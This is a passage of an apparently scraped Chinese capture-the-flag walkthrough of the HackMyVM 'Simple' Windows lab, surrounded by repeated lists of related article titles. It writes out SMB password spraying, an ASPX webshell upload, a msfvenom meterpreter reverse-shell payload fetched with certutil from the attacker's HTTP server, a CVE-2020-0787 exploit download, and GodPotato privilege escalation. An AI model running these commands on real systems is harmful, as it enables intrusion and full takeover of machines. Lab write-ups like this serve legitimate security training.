obligatoria\Nivel obligatorio medio Etiqueta S-1-16-8192所属组是Idministritirs也就是AdministratorC:\Users\Administrador>dir dir El volumen de la unidad C no tiene etiqueta. El n�mero de serie del volumen es: 26CD-AE41 Directorio de C:\Users\Administrador 26/09/2023 18:36 . 26/09/2023 18:36 .. 26/09/2023 15:11 3D Objects 26/09/2023 15:11 Contacts 26/09/2023 15:11 Desktop 26/09/2023 15:11 Documents 26/09/2023 15:11 Downloads 26/09/2023 15:11 Favorites 26/09/2023 15:11 Links 26/09/2023 15:11 Music 26/09/2023 15:24 16.418 new.cfg 26/09/2023 15:11 Pictures 26/09/2023 18:36 13 root.txt 26/09/2023 15:11 Saved Games 26/09/2023 15:11 Searches 26/09/2023 15:11 Videos 2 archivos 16.431 bytes 14 dirs 45.911.502.848 bytes libres C:\Users\Administrador>type root.txt type root.txt HMV1******往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-Simple ：简单 4.1 信息打点端口扫描web界面，通过界面可能存在的系统用户如下ruy, marcos, lander, bogo, vaiper4.2 nxc服务爆破把上面的几个用户，追加到一个字典中，并使用这些用户作为密码进行爆破或者使用rokyou.txtnxc smb 192.168.0.139 -u user -p user nxc smb 192.168.0.139 -u user -p /usr/share/wordlists/rokyou.txt发现是紫色的提示，翻译一下错误就能发现，这密码过期了，需要登录到虚拟机上修改这个账号的密码4.3 近源攻击按esc进入用户列表，选择bogo用户：输入正确的密码bogo后，需要你修改密码尝试执行命令，一切正常4.4 smb渗透再来到smb登录这块，就能正常登录了再LOGS共享文件中发现了一个日志文件，使用get命令将它下载下来尝试将之前的用户字典上传上去，使用put命令，发现没有上传权限日志内容┌──(root㉿kali)-[/data/demo] └─# cat 20231008.log PS C:\> dir \\127.0.0.1\WEB Acceso denegado At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (\\127.0.0.1\WEB:String) [Get-ChildItem], UnauthorizedAccessException + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand Cannot find path '\\127.0.0.1\WEB' because it does not exist. At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (\\127.0.0.1\WEB:String) [Get-ChildItem], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand PS C:\> net use \\127.0.0.1\WEB Se ha completado el comando correctamente. PS C:\> dir \\127.0.0.1\WEB Acceso denegado At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (\\127.0.0.1\WEB:String) [Get-ChildItem], UnauthorizedAccessException + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand Cannot find path '\\127.0.0.1\WEB' because it does not exist. At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (\\127.0.0.1\WEB:String) [Get-ChildItem], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand PS C:\> net use \\127.0.0.1\WEB /user:marcos SuperPassword Se ha completado el comando correctamente. PS C:\> dir \\127.0.0.1\WEB Directorio: \\127.0.0.1\WEB Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/8/2023 9:46 PM aspnet_client -a---- 9/26/2023 6:46 PM 703 iisstart.htm -a---- 10/8/2023 10:46 PM 158 test.php PS C:\> rm \\127.0.0.1\WEB\*.php PS C:\> dir \\127.0.0.1\WEB Directorio: \\127.0.0.1\WEB Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/8/2023 9:46 PM aspnet_client -a---- 9/26/2023 6:46 PM 703 iisstart.htm PS C:\>又得到了一个账号密码user:marcos SuperPassword这个用户也是一样，密码过期，需要重新设置一下密码，重复之前的步骤就好了尝试使用put将一个文件上传上去，上传成功！有上传的权限，那么就可以将aspx马上传上去（这里的web大概率就是网站的web目录了）4.5 获取shell尝试使用put命令上传文件cd /usr/share/webshells/aspx smbclient //192.168.0.139/WEB/ -U marcos # 密码 SuperPassword put cmdasp.aspx访问这个马使用msfvenom生成反弹shell的木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=4444 -f exe -o shell.exe python3 -m http.server使用下载命令，将这个木马上传到靶机上certutil -urlcache -split -f http://192.168.0.147:8000/shell.exe c:\shell.exe # 或者利用smbclient上传也可以，此时只需要输入一个shell.exe在那个aspx命令执行界面打开msf启动监听use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.147 run在命令执行的aspx的输入框中输入这个shell.exe的绝对路径就可以执行，利用下面这个命令定位马的位置where /r c:\ shell.exec:\inetpub\wwwroot\shell.exe执行马4.6 msf内核漏洞扫描bg use multi/recon/local_exploit_suggester set session 1 run尝试利用扫描出来的漏洞use windows/local/cve_2020_0787_bits_arbitrary_file_move存在漏洞但是始终没有创建shell会话找到CVE-2020-0787的exp# 源码 https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION.git # 创建好的 https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/download/1/BitsArbitraryFileMoveExploit.exe此时去上传文件（这里我换了一个网，ip就变了，我用的桥接模式，使用vmbox用nat模式会出问题，导致vmware的虚拟器kali访问不到vmbox，这是最简单的解决方法）smbclient //192.168.110.46/WEB/ -U marcos put BitsArbitraryFileMoveExploit.exe提权失败4.7 土豆提权切换提权方式土豆提权，将这些全都下载下来https://github.com/BeichenDream/GodPotato/releases/tag/V1.20可以看到这里我们执行的whoami已经是系统权限了，此时我们只需要添加一个反弹一个shell到本地来就可以了msf反弹shellshell反弹过来后，却不是system权限，接下来要将这个木马设置为系统权限，而不是这个用户的文件，类似于linux中的属主4.8 修改文件权限GodPotato-NET4.exe -cmd "cmd /c takeown /f c:\inetpub\wwwroot\shell.exe /a"重新反弹即可往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透